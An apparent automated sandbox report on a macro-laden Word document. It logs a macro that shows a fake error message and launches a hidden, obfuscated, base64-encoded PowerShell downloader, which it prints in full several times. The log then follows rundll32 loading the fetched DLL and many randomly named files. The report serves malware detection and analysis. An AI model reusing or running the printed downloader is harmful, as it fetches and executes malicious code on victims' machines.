JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: powershell.exe, 00000005.00000002.2102033680.0000000003A65000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2100547515.000000001000D000.00000002.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2095912827.0000000002780000.00000002.00000001.sdmp
Source: bestand-8881014518 00944.doc Initial sample: OLE summary subject = withdrawal Sports, Toys & Health budgetary management architectures Borders synthesize SSL Usability synergize e-commerce

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: bestand-8881014518 00944.doc Stream path 'Macros/VBA/Oi5oelv0_s4' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Oi5oelv0_s4 Name: Oi5oelv0_s4
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
PowerShell case anomaly found
